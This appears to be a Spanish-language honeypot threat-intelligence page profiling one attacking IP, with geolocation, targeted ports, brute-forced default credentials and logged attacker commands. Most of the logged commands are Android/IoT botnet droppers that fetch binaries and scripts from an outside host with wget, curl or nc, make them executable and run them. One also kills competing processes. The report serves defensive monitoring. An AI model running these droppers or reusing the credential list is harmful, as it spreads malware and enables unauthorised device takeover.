Amenaza Activa • CRITICO
91.224.92.14
🎯
1434
Ataques Totales
🔌
23
Puertos
📡
7
Tipos Ataque
🦠
1
Malware
Geolocalizacion
- Pais
- 🇬🇧 Reino Unido
- Ciudad
- Desconocida
- ASN
- AS209605
- ISP
- UAB Host Baltic
Tipos de Ataque
tanner
adbhoney
honeytrap
cowrie
honeyaml
dionaea
h0neytr4p
Puertos Atacados
9090808180832280888089809010023900026016161661617555555568888300044323231800080+3
Malware Asociado
Credenciales Intentadas
🔐ubnt/ubnt
2x🔐admin/(vacio)
1x🔐admin/admin1234
1x🔐telecomadmin/admintelecom
1x🔐root/Password123!
1x🔐default/default
1x🔐admin/admin
1x🔐root/Pass1234
1x🔐root/(vacio)
1x🔐root/default
1x🔐root/zaq123456g
1x🔐root/Google2015
1x🔐root/1234
1x🔐root/root
1x🔐root/123456
1xComandos Ejecutados
$
cd /data/local/tmp/; toybox nc 91.224.92.14 9000 < /data/local/tmp > received; chmod 777 received;./received28x$
cd /data/local/tmp/; nc 91.224.92.14 9000 < / > received; chmod 777 received;./received28x$
cd /data/local/tmp/; rm -rf arm7; busybox wget http://130.12.180.20:36695/arm7; curl -O http://130.12.180.20:36695/arm7; wget http://130.12.180.20:36695/arm7.sh; curl -O http://130.12.180.20:36695/arm7; busybox wget http://130.12.180.20:36695/arm7; busybox curl -O http://130.12.180.20:36695/arm7; toybox curl -O http://130.12.180.20:36695/arm7; toybox wget http://130.12.180.20:36695/arm7; chmod 777 arm7;./arm713x$
cd /data/local/tmp/; busybox wget http://130.12.180.20:36695/w.sh; sh w.sh; curl http://130.12.180.20:36695/c.sh; sh c.sh; wget http://130.12.180.20:36695/wget.sh; sh wget.sh; curl http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox wget http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox curl http://130.12.180.20:36695/wget.sh; sh wget.sh12x$
cd /data/local/tmp/; rm -rf w.sh; busybox wget http://130.12.180.20:36695/w.sh; sh w.sh; rm -rf c.sh; curl http://130.12.180.20:36695/c.sh; sh c.sh; rm -rf wget.sh; wget http://130.12.180.20:36695/wget.sh; sh wget.sh; curl http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox wget http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox curl http://130.12.180.20:36695/wget.sh; sh wget.sh10x$
cd /data/local/tmp/; rm -rf arm7; busybox wget http://130.12.180.20:36695/arm7; curl -O http://130.12.180.20:36695/arm7; wget http://130.12.180.20:36695/arm7; curl -O http://130.12.180.20:36695/arm7; busybox wget http://130.12.180.20:36695/arm7; busybox curl -O http://130.12.180.20:36695/arm7; toybox curl -O http://130.12.180.20:36695/arm7; toybox wget http://130.12.180.20:36695/arm7; chmod 777 arm7;./arm77x$
cd /data/local/tmp/; rm -rf received; toybox nc 91.224.92.14 9000 < /data/local/tmp > received; chmod 777 received;./received4x$
cd /data/local/tmp/; rm -rf received; nc 91.224.92.14 9000 < / > received; chmod 777 received;./received4x$
echo SHELL_TEST3x$
cd /data/local/tmp/ || cd /tmp || cd /var/tmp; for p in /proc/[0-9]*; do pid=${p##*/}; [ "$pid" -le 300 ] 2>/dev/null && continue; [ "$pid" = "$$" ] && continue; [ "$pid" = "$PPID" ] && continue; exe="/proc/$pid/exe"; [ ! -e "$exe" ] && continue; ! readelf -l "$exe" 2>/dev/null | grep -q INTERP && kill -9 "$pid" 2>/dev/null; done; (wget -q -O cat.sh http://130.12.180.20:36695/cat.sh || busybox wget -q -O cat.sh http://130.12.180.20:36695/cat.sh || nc 130.12.180.20 36695 < /dev/null > cat.sh || b3xEvaluacion de Riesgo
90
/100
BajoMedioAltoCritico